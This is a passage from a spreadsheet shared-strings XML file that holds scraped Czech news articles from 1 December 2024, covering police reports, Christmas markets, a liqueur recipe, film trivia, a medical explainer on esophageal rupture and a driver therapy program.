jsou chráněny autorskými právy jejich vlastníků a jsou poskytnuty pouze pro vzdělávací účely. Pro více informací o autorovi tohoto textu navštivte tyto stránky. Autor: admin@teenage.cz</t>
  </si>
  <si>
    <t>111000</t>
  </si>
  <si>
    <t>20241201_260_3474875313_d55ab4d554b82c48dff8.html</t>
  </si>
  <si>
    <t>d55ab4d554b82c48dff8</t>
  </si>
  <si>
    <t>Lidový doušek</t>
  </si>
  <si>
    <t>Lidový doušek 1.12.2024 Folklorní ležák. EPM : 12% IBU: 25 chmely: Motueka, Nelson Sauvin, Cryopop slad plzeňský Nový koncept, u kterého jde hlavně o jedinou věc. Je to právě tradice všeho druhu, úcta ke všem předkům, kteří nám je předávají z generace na generaci. U tohoto kousku by se mohlo zdát že jde o nějaké výbušnné chmelové kombo, ale opak je pravdou. Pivo je vybalancované, jemné, voňavé po bílých hroznech s jemnou hořkostí a vyšším zbytkovým cukrem, který vám z toho udělá krásnou chmelovou chvilku. &amp;gt;&amp;gt;&amp;gt; více o Minipivovaru Syrovar Syrovín Autor: admin Rubrika transition_slide Monitoring pivních novinek</t>
  </si>
  <si>
    <t>573</t>
  </si>
  <si>
    <t>20241201_261_3693978934_045f9ec404cd62306b20.html</t>
  </si>
  <si>
    <t>045f9ec404cd62306b20</t>
  </si>
  <si>
    <t>Strakonice: Střelec s airsoftkou v parku a opilci na nádraží zaměstnali strážník</t>
  </si>
  <si>
    <t>Strakonice : Střelec s airsoftkou v parku a opilci na nádraží zaměstnali strážník Nějaký ožrala střílí v Sokolovské ulici z airsoftové pistole a míří se zbraní do Rennerových sadů. Toto oznámení si vyslechl velitel směny městských strážníků koncem listopadu a okamžitě na místo vyslal hlídku. „Pětadvacetiletý opilý mladík se neobratně oháněl airsoftovou zbraní, kterou měl mít podle zákona o zbraních na veřejném místě skrytu v pouzdře. Hlídka státní policie si střelce odvezla na služebnu v Plánkově ulici,“ uvedla k případu mluvčí strakonické městské policie Jaroslava Krejčová. Za necelé dvě hodiny se strážníci s tímto mladíkem potkali znovu, a to po naléhavém oznámení, že u křižovatky ulic Plánkova a Krále J. z Poděbrad někdo kope do zaparkovaných aut a lamp veřejného osvětlení. Na jedné z lamp se výtržník vskutku vzteky vyřádil. Nakopl ji tak, že zhasla. A tak si jel mladík zas popovídat s kolegy z obvodního oddělení. Návdavkem si u nich, dle vyjádření policejní tiskové mluvčí, vykoledoval ještě přestupek za hrubé jednání a další problém si nadrobil tím, že odmítl dechovou zkoušku. Telefonát z vlakového nádraží oznámil na městskou policii, že si pochybná muž spletl nádražní halu s obývacím pokojem. Osoba posilněná alkoholem sice budila pohoršení, naštěstí nebyla agresivní a zlá. Muž (54) si ale vyzul boty a udělal si pohodlí na lavičce. „Strážníci ho z budovy vykázali, nicméně za hodinku se do vestibulu vrátil a hlídka ho musela vyprovodit znovu,“ uvedla mluvčí strážníků Jaroslava Krejčová. Problém s koordinací alkoholem zmámeného těla měl také 57letý muž z Plzeňska . Nebezpečně vrávoral u silnice v Nádražní ulici. Navzdory hladince byl ale schopný se o sebe postarat. Postarat se o sebe ale nedovedli dva opilci, kterým jela posádka zdravotnické záchranné služby , protože potřebovali lékařské ošetření. Pomoci museli strážníci, kteří doprovázeli záchranáře i do nemocnice a setrvali na oddělení po celou dobu vyšetření obou mužů. Jednalo se 42letého „starého známého“ Strakoňáka a 25letého Příbramáka. Autor: Klára Aleśová Autor person Klára Alešová</t>
  </si>
  <si>
    <t>20241201_262_3474877830_56a99a3764770d890e24.html</t>
  </si>
  <si>
    <t>56a99a3764770d890e24</t>
  </si>
  <si>
    <t>Vaječňák s&amp;nbsp;příchutí Karibiku. Haitské cremas je bez vajec a&amp;nbsp;hotové za 5 minut</t>
  </si>
  <si>
    <t>Vaječňák s&amp;nbsp;příchutí Karibiku . Haitské cremas je bez vajec a&amp;nbsp;hotové za 5 minut Pokud se váš rodinný rozpočet nervózně orosil už o prázdninách a na Vánoce v Karibiku to letos nevypadá, můžete si pocit luxusu navodit výrobou a následnou konzumací drinku cremas. Ti šťastnější z nás pak mohou drink vyrobit a jako (kyselinou napuštěnou) náplast věnovat svým chudým příbuzným, než sami frnknou za teplem. Cremas je obdoba vaječného likéru bez vajec, která se připravuje na Haiti . Jedná se o tradiční haitský sváteční drink doprovázející jakoukoli „festive season“, takže třeba i křtiny a svatby. Nám se bude náramně hodit především v prosinci, protože, jak známo, Vánoce a příbuzní se bez alkoholu moc přežít nedají. Tato verze je trochu cremas gone wild, Haiťané by nesouhlasně kroutili hlavou, ale kam bychom došli, kdybychom se pozastavili nad každým nesouhlasným syknutím, že ano. Proto uvedený poměr ingrediencí berte jako odrazový můstek, kondenzovaného mléka můžete o plechovku ubrat, kokosový krém vyměnit za kokosové mléko a alkoholu jak jinak než přidat. Foto Eva Malúšová Likér cremas („vaječňák“ s kokosovým mlékem &amp;amp; bez vajec) Potřebujete: 2 plechovky slazeného kondenzovaného mléka 2 plechovky neslazeného kondenzovaného mléka 2 plechovky kokosového krému 2 hrnky bílého rumu 2 svitky skořice 4 hvězdičky badyánu 1 lžička nastrouhaného muškátového ořechu 1/4 lžičky mletého kardamomu 1/4 lžičky vanilkových semínek kůra z jedné limety šťáva z 1 až 2 limet (dle chuti) Postup Jednu plechovku neslazeného zahuštěného mléka vlijte do rendlíku, vložte do něj všechno koření a nastrouhanou limetovou kůru a pomalu přiveďte k varu. Ihned odstavte a nechte přikryté louhovat do vychladnutí. Přeceďte přes jemné sítko. Smíchejte voňavé kořeněné mléko se zbytkem ingrediencí, promixujte tyčovým mixérem nebo ještě lépe ve stolním mixéru, až se vše krásně spojí. Ochutnejte, dolaďte podle svých preferencí a přelijte do vyčištěných a vysušených lahví. Nechte pár dnů uzrát a popíjejte, obdarovávejte a vyrábějte další šarže. Před požitím protřepat, nemíchat. Foto Eva Malúšová Autor: Kateřina Bičíková Harudová Autor Kateřina Bičíková Harudová</t>
  </si>
  <si>
    <t>20241201_263_3474866226_e39bd75df9d2b1bcf82d.html</t>
  </si>
  <si>
    <t>e39bd75df9d2b1bcf82d</t>
  </si>
  <si>
    <t>Vladimír Burjánek: Brýle</t>
  </si>
  <si>
    <t>Vladimír Burjánek: Brýle Zajímavé situace někdo vyhledává a někdo k nim přijde jako slepý k houslím. Můj soused má velmi hodnou, tolerantní ženu, která ho miluje, splní každé jeho přání a jak se říká, udělá, co mu na očích vidí. Rozmazluje ho pořád. Jídlem počínaje a domácími pracemi konče. Čtěte také Vladimír Burjánek: Já taky Pepa nesnáší nakupování, tak ho nenutí, vymetat po krámech slevové akce. Sedí obvykle jen v autě a poslouchá písničky. Paní mu toleruje s úsměvem i přestupky a slabosti. Třeba pravidelné docházky na pivo a kartičky s kamarády, se kterými se schází jednou týdně. Loni, když se ke konci roku vracel pozdě domů, se spolustolovníky to tentokrát nějak přepískli s konzumací, ztratil své oblíbené brýle na dálku. Jak otevřel vrátka, jeho krok znejistěl, najednou dostal pořádnou vrtuli, nevybral balanc a škrtnul stranou obličeje o angrešt. Ráno ho bolela hlava jako střep. Žena mu nesla snídani, teprve teď se na něho podívala a zhrozila se. Čtěte také Vladimír Burjánek: Šprýmař Přišla na škrábance v obličeji. Zalhal, že za brankou viděl na třešince sousedovic kočku Mícu, chtěl ji sundat, aby šla domů. Ona se lekla, asi ho nepoznala a poškrábala ho. Neviděla jsi moje brýle? Zeptal se hned ženy. Hledali doma dlouho, ptal se i v restauraci, ale brýle jakoby se do země propadly. Když se definitivně smířil se ztrátou, pořídil si nové. Ty staré se ale nakonec našly. Objevila je manželka, když mu na jaře pomáhala při postřiku stromků. Byly zamotané se šňůrkou na jednom z angreštu a hned jí svitlo. Pepíčku, zahrozila manželka prstem, já ti dám Mícu. Autor: Vladimír Burjánek, Milan Baják Autoři person Vladimír Burjánek Milan Baják Rubrika transition_slide Nedělní káva</t>
  </si>
  <si>
    <t>4790</t>
  </si>
  <si>
    <t>20241201_264_3475732940_249320038dbd3ac42130.html</t>
  </si>
  <si>
    <t>249320038dbd3ac42130</t>
  </si>
  <si>
    <t>CO NEVÍTE o Popelce?</t>
  </si>
  <si>
    <t>CO NEVÍTE o Popelce? Bez slavné pohádky Tři oříšky pro Popelku si spousta z nás Vánoce neumí představit. Je něco, čím vás ještě dokáže překvapit? To, že tehdy 23letého Pavla Trávníčka musel předabovat kvůli jeho silnému moravskému přízvuku Petr Svojtka nebo že do role Popelky si režisér Václav Vorlíček původně vyhlédl Janu Preissovou, ale ta byla v době natáčení v pokročilém stadiu těhotenství, jste možná už slyšela. Tušíte ale, jaké jsou další zajímavosti? LEDOVÉ KOMPLIKACE Při natáčení se musely záběry kvůli náledí často opakovat, jelikož se na něm neustále smekali koně. Několika hercům se kvůli tomu dokonce nevyhnula drobná zranění, třeba i Libuše Šafránková , představitelka Popelky, na zasněžených cestách několikrát z koně spadla. ŠATY TO MÁLEM NESTIHLY Popelčiny šaty, které si oblékla nakonec na ples, byly na place až na poslední chvíli. Kostýmní návrhář Theodor Pištěk je totiž dodělával až těsně před natáčením scény, jelikož ladil detaily jako výšivky a ozdobné kamínky. Naštěstí je doručil včas a rozhodně stály za to. OPILÝ MENŠÍK Vladimír Menšík měl při natáčení pohádky problémy s alkoholem , což se projevilo v některých scénách, ve kterých jen stál na místě a nemluvil. I v závěrečné scéně, kdy lidé na dvoře hospodářství oslavují Popelku a prince, jediný nevyhodí radostně pokrývku hlavy do vzduchu, ale s nepřítomným výrazem hledí kamsi za kameru. PRINC SE BÁL KONÍ Pavel Trávníček , představitel prince, měl ve skutečnosti velký strach z koní a s jízdou na nich neměl žádné zkušenosti. Během přípravy na roli musel absolvovat intenzivní tréninky jezdectví. Při natáčení se ale stále potýkal s nervozitou, což scény často komplikovalo, někde dokonce musel být použit dublér, jelikož Pavel Trávníček nebyl schopen udržet rovnováhu na cválajícím koni. JAZYKOVÁ BARIÉRA Představitelka Popelčiny macechy Carola Braunbock celé natáčení mluvila pouze německy a předstírala, že česky nerozumí. Až později vyšlo najevo, že ve skutečnosti je to odsunutá sudetská Němka, která češtinu stále ovládá. PÁCHNOUCÍ SNÍH Zima roku 1973, kdy se pohádka natáčela, byla v Německu bez sněhu, a tak si štáb poradil jinak – umělým sněhem. Ten byl ale vyrobený z rozemletých rybích kostí a ukrutně zapáchal. Pozitivum na tom ale bylo, že zápach nutil štáb k rychlejšímu pracovnímu tempu. LETNÍ OBLEČENÍ Natáčet se mělo původně v létě, ale režisér Vorlíček nechtěl čekat, a tak se děj přesunul do zimního období. Kostýmy už ale byly ušité tenké, jelikož se počítalo s vysokými letními teplotami. Hercům tudíž často byla ohromná zima. Například když se točila scéna s Popelkou ve svatebních šatech, musel štáb Libuši Šafránkovou mezi záběry zahřívat. NĚKOLIK KONÍ Protože v době natáčení se kvůli epidemii slintavky a kulhavky nemohla zvířata převážet přes hranice, potřebovali mít filmaři jednoho koně v Německu a dalšího u nás. Nakonec byli Popelčini Jurášci celkem tři. Autor: Připravila: red, foto: Profimedia.cz, archiv , Zbyněk Schnapka</t>
  </si>
  <si>
    <t>39350</t>
  </si>
  <si>
    <t>20241201_265_3474862011_cde83670a3186404c49b.html</t>
  </si>
  <si>
    <t>cde83670a3186404c49b</t>
  </si>
  <si>
    <t>Boerhaaveův syndrom – prasknutí (ruptura) jícnu – příznaky, příčiny a léčba</t>
  </si>
  <si>
    <t>Boerhaaveův syndrom – prasknutí (ruptura) jícnu – příznaky, příčiny a léčba 4.33/5 (12) Vydáno v kategorii: Nemoci | Dne: 1 prosince, 2024 | Autor: Daniel Borník Obsah článku Může nadměrné pití alkoholu způsobit prasknutí jícnu? Studie a zdroje článku Boerhaaveův syndrom je vzácný, ale život ohrožující stav, který vzniká prasknutím (rupturou) jícnu. Nejčastěji k němu dochází v důsledku náhlého a prudkého zvýšení tlaku v jícnu, například při intenzivním zvracení. Tato spontánní ruptura vede k úniku obsahu jícnu (jídlo, žaludeční šťávy) do hrudní dutiny, což může způsobit zánět (neboli mediastinitidu ) a další závažné komplikace. Méně často je syndrom spojen s lékařskými procedurami, poraněním jícnu nebo zvýšením nitrobřišního tlaku. Boerhaaveův syndrom vyžaduje urgentní lékařský zásah, protože bez léčby hrozí smrt. Boerhaaveův syndrom je ruptura jícnu. Co je to Boerhaaveův syndrom? Boerhaaveův syndrom je ruptura jícnu. To se stává, když silné zvracení nebo nadměrné namáhání způsobí rozštěpení stěny jícnu. Lékaři toto nazývají „spontánní ruptura“, aby to odlišili od ruptur způsobených přímým poraněním vašeho jícnu. Boerhaaveův syndrom je neobvyklou příčinou ruptury jícnu, která postihuje odhadem 0,0003 % populace. Představuje 15 % všech traumatických ruptur jícnu. Jaký je rozdíl mezi Boerhaaveovým syndromem a Mallory Weissovým syndromem? Malloryho-Weissův syndrom je trhlina ve vnitřní výstelce vašeho jícnu. Stejně jako Boerhaaveův syndrom se také vyskytuje po silném zvracení nebo namáhání a obojí bývá spojeno s pitím příliš velkého množství alkoholu . Malloryho-Weissův syndrom způsobuje, že pacient bude zvracet krev, ale neprotrhne se mu celý jícen. Na druhé straně Boerhaaveův syndrom protrhává celou tloušťku stěny jícnu. Toto se také nazývá transmurální trhlina (transmurální = procházející celou stěnou) a bude pravděpodobně potřeba chirurgický zákrok – tento zákrok může být otázkou života nebo smrti. Co se stane, když se jícen protrhne? Rozštěpení jícnu je naléhavý problém a může být smrtelný. Je to proto, že váš jícen, jako součást vašeho gastrointestinálního traktu, je „navržen“ tak, aby přenášel látky, které jsou toxické pro zbytek vašeho těla. Pokud částice potravy, bakterie a trávicí chemikálie unikají z vašeho jícnu do hrudníku nebo břicha, může dojít k vážné infekci. Infekce, která se dostane do vašeho systémového krevního řečiště, může vést k septikémii a sepsi, což je život ohrožující reakce, která může znamenat šok, selhání více orgánů a smrt. Boerhaaveův syndrom může postihnout kohokoli, ale je častější u mužů, a u lidí starších 50 let. Až 80 % postižených jsou muži středního věku. Je častější u lidí, kteří hodně pijí alkohol . Příznaky Boerhaaveova syndromu? Silná bolest na hrudi nebo v horní části břicha, která se může šířit do zad nebo ramen. Dýchací potíže. Zvracení s obsahem krve. Horečka a příznaky sepse (např. zimnice, zrychlený tep, nízký krevní tlak). Příznaky infekce jako horečka a pocení. Může se objevit podkožní emfyzém (krepitace způsobená únikem vzduchu pod kůži). Tvrdé, tuhé břicho. Bolest nebo kašel při polykání. Otok v tkáních hrudní dutiny vzduchem nebo tekutinou. Jak bolestivý je Boerhaaveův syndrom? Bolest je dost silná – někteří říkají nesnesitelná – a nejasně lokalizovaná kolem místa prasknutí. Nejčastěji se jedná o dolní třetinu vašeho jícnu, která prochází spodní částí vaší hrudní dutiny a horní částí vaší břišní dutiny. Ale mohla by být i o něco výše. Může také vyzařovat do zad nebo ramen. Sponzorováno Diagnostika Rentgen hrudníku nebo CT, které může odhalit vzduch nebo tekutinu v okolí jícnu. Endoskopie se provádí opatrně, aby se stav nezhoršil. Příčiny Zdá se, že se na tomto problému podílejí dva faktory. Jedním z nich je nahromadění tlaku uvnitř vašeho jícnu v důsledku mimořádného úsilí nebo namáhání. Druhým je nahromadění podtlaku mimo váš jícen, když se váš horní jícnový svěrač v reakci na tlak neuvolní. Nejčastější příčinou napětí u Boerhaaveova syndromu je silné nebo opakované zvracení. Mezi další možné příčiny patří porod, záchvaty, vzpírání a požití něčeho žíravého. Normálně by za těchto okolností měly nervové signály spustit sval cricopharyngeus, aby se uvolnil a uvolnil tak vnitřní tlak. Ale u Boerhaaveova syndromu tato neuromuskulární koordinace z nějakého důvodu selhává. Tedy příčiny: Nejčastěji prudké zvracení (např. po přejedení, intoxikaci alkoholem nebo u lidí s bulimií). Méně často je syndrom spojen s lékařskými procedurami, poraněním jícnu nebo zvýšením nitrobřišního tlaku. Může nadměrné pití alkoholu způsobit prasknutí jícnu? Nadměrné pití alkoholu je zde určitě rizikovým faktorem. Klasický projev Boerhaaveova syndromu následuje po opakovaných epizodách zvracení po nadměrné konzumaci jídla a/nebo alkoholu . Nadměrná konzumace alkoholu připravuje pole tomuto problému, stejně jako záchvatovité přejídání a bulimie. Mezi další možné rizikové faktory patří základní poruchy jícnu, jako je ezofagitida a eozinofilní ezofagitida, Barrettův jícen a peptický vřed. Většina lidí postižených Boerhaaveovým syndromem má však normální jícen. Léčba Boerhaaveova syndromu Boerhaaveův syndrom vyžaduje urgentní lékařský zásah, protože bez léčby hrozí smrt. Léčba probíhá podle těchto kroků: IV tekutiny. Většina lidí potřebuje okamžitý přívod tekutin přes IV. Antibiotika. Širokospektrální antibiotika budou podávána intravenózně ke kontrole infekce. Chirurgická oprava prasklého jícnu. V ideálním případě by měla být prasklina opravena přímo do 24 hodin. V závislosti na stavu pacienta může být váš chirurg schopen použít minimálně invazivní chirurgické techniky, jako je video-asistovaná torakoskopická chirurgie (VATS). Některé nouzové případy může být nutné řešit otevřenou torakotomií, aby byl umožněn rychlý a důkladný přístup k celé hrudní dutině. Drenáž/debridement. Kromě přímého řešení trhliny bude nutné vypustit a sterilizovat veškeré infikované tekutiny v dutině a odstranit jakoukoli infikovanou nebo nekrotickou (mrtvou) tkáň. V některých závažných případech to může znamenat odstranění části jícnu pacienta. Pokud není operace možná do 24 hodin od prasknutí, přímé řešení nemusí fungovat. Okraje rány mohly začít tuhnout nebo se třepit. V tomto případě může váš chirurg potřebovat odstranit část nebo celý jícen (ezofagektomie). Pokud potřebujete náhradu jícnu, můžete ji podstoupit po šesti týdnech. Alternativní výživa. Zatímco se jícen léčí, nebude ho pacient moci používat k polykání jídla, takže bude potřebovat alternativní způsob krmení. M ůže to být trubicí nebo žilou. Někdy (u stabilních pacientů s menšími rupturami) se volí konzervativní léčba znamenající hladovění, nitrožilní výživu a sledování. Sponzorováno Pokud máte podezření na Boerhaaveův syndrom, je nutné okamžitě vyhledat lékařskou pomoc. Studie a zdroje článku Boerhaave Syndrome Autoři: Anisha R. Turner; Sara A. Collier; Sherry D. Turner . Sponzorováno Líbil se vám článek? Ohodnoťte ho. Hodnocení příspěvku Daniel Borník ( více o nás ) Dan miluje sport. Přispívá články zejména z oblasti regenerace, fyzio, cvičení a píše i o nemocech. Náš tým vám všem chce přinášet zajímavé informace ze světa zdraví, cvičení, výživy, rehabilitace a obecně zdravého životního stylu. Ve většině našich článků vycházíme z odborných studií a lékařských prací. Vždy se snažíme na studie odkazovat, ověříte si tak pravost. Více informací o nás najdete zde - mrkněte na náš tým. Líbil se vám náš článek? Sdílejte ho, uděláte nám radost Přečtěte si také naše další články Autor: Daniel Borník Autor person Daniel Borník Rubrika transition_slide Nemoci</t>
  </si>
  <si>
    <t>3260</t>
  </si>
  <si>
    <t>20241201_266_3474808785_1cb63b3310e93e1d7f9c.html</t>
  </si>
  <si>
    <t>1cb63b3310e93e1d7f9c</t>
  </si>
  <si>
    <t>Vánoční trhy na náměstí odstartovaly advent v Uhlířských Janovicích</t>
  </si>
  <si>
    <t>Vánoční trhy na náměstí odstartovaly advent v Uhlířských Janovicích Mezi vystavovateli nechyběli profesionální řemeslníci, kteří představili ručně vyráběné ozdoby a dekorace, ale také žáci místní základní a umělecké školy nebo členky spolku Tvořivých žen. Ti všichni se postarali o pestrou nabídku vánočních produktů, jako byly ozdoby na stromeček, adventní věnce, svíčky či perníčky s jemně propracovanými motivy. play_fill Volný čas Pro návštěvníky bylo připraveno také bohaté občerstvení. Horké nápoje, včetně tradičního svařeného vína , zahřály v chladném počasí, zatímco stánky s dalšími dobrotami uspokojily chuťové buňky všech přítomných. Vánoční trhy v Uhlířských Janovicích nejsou jen místem pro nakupování, ale také příležitostí k setkání sousedů, přátel a rodin. Staly se úspěšným startem adventu a ukázaly, že tradice vánočních trhů ve městě je nejen oblíbená, ale také důležitá pro udržování komunitního ducha. Místní se již nyní těší na další akce, které budou v prosinci následovat. | Video: Youtube Autor: Richard Karban Autor person Richard Karban</t>
  </si>
  <si>
    <t>5750</t>
  </si>
  <si>
    <t>20241201_267_3474808261_3bd99f4ed0e6f9d6bf4d.html</t>
  </si>
  <si>
    <t>3bd99f4ed0e6f9d6bf4d</t>
  </si>
  <si>
    <t>Letošní advent je tu. Karlovarské trhy: Svařák stojí 75, punč 90, klobása 140</t>
  </si>
  <si>
    <t>Letošní advent je tu. Karlovarské trhy: Svařák stojí 75, punč 90, klobása 140 Karlovy Vary – Oblíbené korzo mezi hotelem Thermal a Mlýnskou kolonádou v Karlových Varech se v sobotu opět slavnostně rozsvítilo. V Karlových Varech začal advent, v tento den se také zahájil prodej na vánočních trzích, které jsou tradičně poslední roky na Mlýnské kolonádě. Svátečně nazdobená promenáda byla plná lidí, kteří se vyrazili podívat, jaký bude ten letošní advent v Karlových Varech . Pořadatel vánočních trhů, městská společnost KV City, už před jejich konáním avizovala, že ačkoliv byly změny na trzích žádoucí, a to především kvůli nabízenému sortimentu, ten bude podobný jako v minulosti. Pořadateli se totiž nedaří sehnat do Karlových Varů prodejce, kteří nabízejí tradiční vánoční zboží, a tak jsou ty letošní trhy opět hlavně o jídle. A za kolik co pořídíte? Červené svařené víno stojí od 75 korun, punč 95, klobásu zakoupíte za 140 korun, bramborák za 80, hranolky také za 80 korun, palačinku za 120 a panáček na zahřátí za 60. play_fill Karlovarsko Mezi trhovci, kteří nabízejí občerstvení, jsou ale přece jen i ti, jež prodávají také dárky a různé vánoční dekorace. „Chtěli jsme to zkusit, jsme tu poprvé, a přitom jsme z Varů,“ uvedla Miroslava Kronková, která dekoruje ruční malbou porcelán pod svou firmou Best and mum. „Poprvé jsme prodávali na zahájení sezony. Pořadatel nás nyní kontaktoval, zda bychom zase nepřišli. Zatím si nemůžeme stěžovat. Ten první den vyšel, zájem lidi měli, hlavně tedy cizinci, ale nakoupili u nás i Češi,“ dodala Karlovaračka. close info Zdroj: Deník/ Jana Kopecká zoom_in Advent 2024 v Karlových Varech . Z regionu pochází také Adriana Ajrulová, konkrétně z Boru u Ostrova. I ona prodává na karlovarských vánočních trzích poprvé. Sortiment ale nevyrábí, ale nakupuje ve velkoskladu. Jde o různé vánoční dekorace, například i dřevěné betlémy. „Mohlo by to být lepší. Ty levné věci, které jsem si myslela, že půjdou nejvíce, my tu zůstávají. Nabízím třeba louskáčky za sto korun, nebo sadu se čtyřmi po třech stovkách. O ty zájem není. Varáci jen pokukují, kupují hodně Ukrajinci a Němci,“ svěřila se podnikatelka. Vánoční trhy jsou letos mimořádně až do 1. ledna. Aktuální program karlovarského adventu začíná oficiálně v neděli 1. prosince, kdy se před hotelem Thermal v 18 hodin rozsvítí vánoční strom. Autor: Jana Kopecká Autor Jana Kopecká Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>9190</t>
  </si>
  <si>
    <t>5520</t>
  </si>
  <si>
    <t>20241201_268_3474742637_3a41a609818906d2e8f7.html</t>
  </si>
  <si>
    <t>3a41a609818906d2e8f7</t>
  </si>
  <si>
    <t>Drahotínský rybník vydal kapitální kousky. Jeho výlov přilákal stovky lidí</t>
  </si>
  <si>
    <t>Drahotínský rybník vydal kapitální kousky. Jeho výlov přilákal stovky lidí Prodej ryb začal hned na místě a u kádí s pultem vytvořili lidé dlouhou frontu. Cena je potěšila, zůstala stejná jako v loňském roce. „Kapři z Drahotínského rybníka se tu letos prodávají opět za 120 korun za kilogram,“ potvrdil Martin Gregar, vedoucí oddělení vodního hospodářství Správy veřejného statku města Plzně . Plzeňsko Všechny slovené a neprodané ryby se převezly na městské sádky u rybníka Košináře k vánočnímu prodeji, který začne 19. prosince. Tam si bude možné zakoupit i třeba štiku, sumce nebo lína, pokud si pospíšíte. close info Zdroj: Deník/Pavel Bouda zoom_in Tradičně zajímavou podívanou připravili lidem městští rybníkáři. Na místě probíhal i prodej ryb. Na devítihektarovém rybníku u Zruče na severním Plzeňsku rybáři dělali výlov vždy po dvou letech, s ohledem na nedostatek vody. V letošním roce jej však zopakovali hned po roce. play_fill Právě jsme se narodili „Letos je totiž dostatek vody, ale jestli budeme teď lovit rybník každoročně, to nemohu slíbit. Může se stát, že budeme lovit příští rok jiný rybník a ten Drahotínský zůstane nevylovený,“ vysvětlila Jiřina Maršálková, referentka vodního hospodářství Správy veřejného statku. Drahotínský rybník je spolu s Boleveckými a Kokotskými rybníky historickým majetkem města Plzně . Jeho výlov probíhá vždy na podzim a je spojen s prodejem čerstvých ryb. Chov ryb spolu s vařením piva patřil ve středověku k nejlukrativnějším podnikatelským činnostem, i proto plzeňští konšelé rozhodli o vytvoření soustavy rybníků ještě dříve, než vznikly ty v jižních Čechách . Autor: Pavel Bouda Autor person Pavel Bouda</t>
  </si>
  <si>
    <t>11200</t>
  </si>
  <si>
    <t>20241201_269_3474706880_1fea9d6779093d578728.html</t>
  </si>
  <si>
    <t>1fea9d6779093d578728</t>
  </si>
  <si>
    <t>Kniha Hledá se děda vznikla díky vnukovi. V Chebu ji pokřtili otiskem palce</t>
  </si>
  <si>
    <t>Kniha Hledá se děda vznikla díky vnukovi. V Chebu ji pokřtili otiskem palce Od nápadu po vydání knížky pro nejmenší Hledá se děda uplynulo pět let. „Vznikla na základě toho, že se náš vnouček Kuba narodil. Kniha je mojí prvotinou a má žena Blanka ji ilustrovala,“ řekl karikaturista a kreslíř Mirek Vostrý , který začal publikovat kreslené vtipy už v letech 1992 a 1993 v regionálních novinách Hořovické noviny později Podbrdské noviny. Hlavním hrdinou příběhů knížky je právě Kuba . Chebsko Knížku pokřtil spisovatel a scénárista Miroslav Adamec . „ Mirek je nejostřejší tužkou v penále,“ konstatoval. „Kdysi mi Karel Smyczek řekl, že tak dlouho jsi živý, jak dlouho na tebe vzpomínají tvoji vnuci. Tuhle knížku budou číst vnuci, i vnuci vnuků a Mirek s Blankou budou tak žít pořád mezi námi,“ podotkl těsně před křtem, který ale nebyl vínem , šampaňským, jak se s oblibou dělává, ale otiskem nasliněného palce. „Přeji knize, aby se líbila Kubovi a celé řadě dětem, vnoučatům, a aby tam nacházely děti poučení i zábavu.“ V Chebu v Galerii 4 výstava ilustrací pro nejmenší Blanky a Mirka Vostrých potrvá až do 22. ledna 2025. Autor: Antonín Hříbal Autor Antonín Hříbal</t>
  </si>
  <si>
    <t>20241201_27_3478926966_2ff6396f570bf11e150d.html</t>
  </si>
  <si>
    <t>2ff6396f570bf11e150d</t>
  </si>
  <si>
    <t>Technologie zlínské Wisty tryská ve španělském Alavézu</t>
  </si>
  <si>
    <t>Technologie zlínské Wisty tryská ve španělském Alavézu V regionu známém nejen pro své vynikající červené víno , ale také pro vyspělý průmysl, byl úspěšně dokončen nový projekt zlínské firmy Wista zaměřený na letecký průmysl. Tento projekt zahrnoval instalaci speciálního tryskacího boxu pro hliníkové slitiny, který bude sloužit k výrobě funkčních částí letadel. „Realizace byla výjimečná díky použití dvou typů extrémně jemných abraziv (pod 95 µm), což umožnilo práci až dvou pracovníků současně. Speciální tryskací zařízení bylo navrženo tak, aby umožňovalo práci s jemnými abrazivy a poskytovalo výstupy pro více pracovníků obsluhy,“ říká Jiří Neuwirth, majitel zlínské značky Wista. Pro zvýšení bezpečnosti a pracovního komfortu byla použita konzole BAABS, která je ideální pro dlouhodobou práci. Projekt byl realizován v hodnotě 110 000 €. Díky stavebnicovému řešení byla montáž dokončena za pouhých pět pracovních dnů, a to s týmem tří montérů – jednoho z firmy WISTA a dvou místních pracovníků. Zakázka byla získána díky místnímu obchodníkovi a referencím technologie tryskání rychlovlaků firmy TALGO , která se podílí také na výrobě pro letectví. TALGO je známá svými skelety vlaků a letadel z hliníkových slitin. V současné době jsou v jednání další projekty, což naznačuje pokračování a rozšíření spolupráce. (1.12.2024)</t>
  </si>
  <si>
    <t>20241201_270_3475965057_a3b3100870d979e366f2.html</t>
  </si>
  <si>
    <t>a3b3100870d979e366f2</t>
  </si>
  <si>
    <t>Terapeutickými programy pro řidiče prošlo 370 lidí, na hodnocení je podle ministerstva dopravy ještě brzy 01. 12. 2024 Česká justice Sdílet Do terapeutických programů pro řidiče „recidivisty“ se mělo podle odhadů Centra dopravního výzkumu hlásit ročně 15 až 20 tisíc řidičů. Dosud jimi úspěšně prošlo 370 lidí. Od letošního dubna do září se do nich podle mluvčí ministerstva dopravy Aleny Mühl přihlásilo 748 lidí. „Co se týká vyhodnocení, jestli a jak se terapeutické programy osvědčily, zatím je ještě brzy dělat závěry,“ sdělila Ekonomickému deníku. Od spuštění programů podle mluvčí uplynula relativně krátká doba a žadatelům, kterým byl od 1. července 2023 udělen zákaz řízení motorových vozidel, tyto zákazy podle ní teprve postupně končí. Vyhodnocení chce udělat resort dopravy po přibližně roce fungování. Programy pro řidiče mohou vést pouze akreditovaní lektoři, těch je podle Aleny Mühl 138. Ředitel Divize dopravních technologií a lidského faktoru Centra dopravního výzkumu Pavel Řezáč Ekonomickému deníku v květnu řekl, že v letošním roce ještě vysoký zájem vzhledem ke startu kurzů v dubnu nepředpokládá. „Klienti typicky nechávají tuto povinnost až na dobu, kdy žádají o řidičské oprávnění zpět, i přesto, že mohou program realizovat kdykoli v průběhu odejmutí řidičského oprávnění. To způsobuje velmi pozvolný náběh,“ sdělil tehdy. Speciální terapeutické programy cílí zejména na řidiče-recidivisty. Kvůli vrácení řidičského průkazu je musí podstoupit například řidiči, kteří odmítli dechovou zkoušku na alkohol nebo psychotropní látky, přišli o řidičský průkaz na dobu nejméně 18 měsíců, anebo jim to nařídil soud. Novou povinnost letos na jaře zavedla novela zákona o pozemních komunikacích. Mohlo by vás zajímat Zlomyslné telefonáty na tísňové linky? Vyhláška má umožnit blokaci volajících Cena terapeutických programů je daná vyhláškou ministerstva dopravy a je stanovena na 13 310 korun včetně DPH. Terapeutické programy pro řidiče zpracovalo Centrum dopravního výzkumu ve spolupráci s výzkumnými pracovišti. (teč) Autor: Hypo na míru s.r.o. || Česká justice</t>
  </si>
  <si>
    <t>4450</t>
  </si>
  <si>
